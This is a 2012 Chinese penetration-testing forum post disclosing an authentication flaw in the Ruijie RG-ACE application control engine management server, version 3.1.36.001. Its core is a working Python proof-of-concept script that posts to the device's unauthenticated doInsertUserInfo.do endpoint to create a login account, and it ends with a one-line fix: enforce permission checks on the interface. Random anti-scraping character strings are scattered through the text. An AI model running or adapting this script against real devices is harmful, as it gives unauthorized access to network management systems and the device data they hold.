找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2589|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低): {8 q' _, p, u7 e7 ~& A
1 P5 z0 B3 U5 j. K
3 R" c$ V7 g5 i) Y8 w) l
测试的具体版本是
5 P7 p. `5 l% k- g) p4 ^8 L产品名称: 锐捷应用控制引擎
' r" P4 t( r& G( G' a版本号: 3.1.36.001 TC2 k% A$ q( l8 g) \0 \
编译时间: 2011042917309 m  `) x  I4 h

, l; v' O$ g0 j2 h& A; J3 c2 h+ L6 V% ]! o8 K
漏洞证明:5 F2 S! A, I9 m. t# Q* U
6 }9 M' \( `1 O0 d, Q$ Y* x1 q
  m3 S: Z7 L" V+ U) @) }5 x

$ J6 C+ T( ^: n# S2 f  w+ ]+ u0 f0 {7 A8 m# p5 d- u

  }9 T& S. ^, y& p# b9 Y% g) T1 N8 f$ s5 H( d* D7 z
执行脚本( P4 }; a5 D7 N! c
#! /usr/bin/env python
% s6 T# T# A9 `. K, f#coding=gbk3 x# N$ C/ w, ~# T
#RG-ACE管理服务器 V3.1.36.001/ b' j: V) S$ K, P; U5 _
import urllib2, urllib,cookielib
9 u( B. l8 P! [7 Surl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
+ L  T5 w: L! J$ I5 H: u1 z" b9 b7 kopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))+ z( ]2 S! D7 S9 S  I4 o* ^5 F
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
3 \2 u; B/ w( N: z. [  w, ?4 F6 g* y$ Bpost=(("event","userManager.doInsertUserInfo"),! d' a: s! \/ `; c  k
("useractionname","addButtonValue"),. o8 k: p* `  D: k$ i$ i
("useropermanager","userManager"),
  t2 @8 g' C, F0 T3 l# n+ Y("userName","t"), #######账号自己加
6 A, B0 P) \8 Q9 Z. K("pwd","aaaaaa"),######密码自己加
, L/ L% R7 I0 ~% F6 i("trueName","ad"),
1 Y5 ^' m8 I1 z  x2 A9 r("email",""),) J# x$ ^; I& d9 ?
("mobilePhone",""),8 Q# i6 q9 z5 d9 d& t
("officePhone",""),- F7 C0 q8 ~( A* ~
("addr",""),& L7 ?" q% L5 J  f& D
("submit","确定"))/ c, F* F# b, f( a; t5 q
urllib2.install_opener(opener)
5 R% V) ~* K0 e- ^p=urllib2.urlopen(url, urllib.urlencode(post)).read()
# l1 x, f% E3 w" a3 _% ~print "Done"
5 A2 I7 N/ k! Y( o' b8 j7 w% v$ H0 M* k' S
登录,连接设备
5 ]" t1 m$ Q, ^7 m! r
! E! u) G' t4 s: A$ @1 ~
6 |2 t5 V; J" h
3 k9 t  n; G2 H7 O
# s7 Y( ^' p2 \) \* f
( `9 v" a$ m/ y& {默认的管理员admin权限更大点
$ }* H; V8 t4 @
% b5 J4 t  H0 @5 @) C
& u  G/ X! }1 A% V2 q+ _, x7 G( ]& Y# n# Z7 b- z

( _5 b) B0 W) e+ a8 m: y2 x4 Q* W0 A0 G3 {" p  S+ o) N; }
修复方案:
: o5 A9 s. H( d; X! _加强对接口的权限验证7 P5 g# c; S% i9 b+ a2 S; V
1 K- L7 {" f) f& h
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表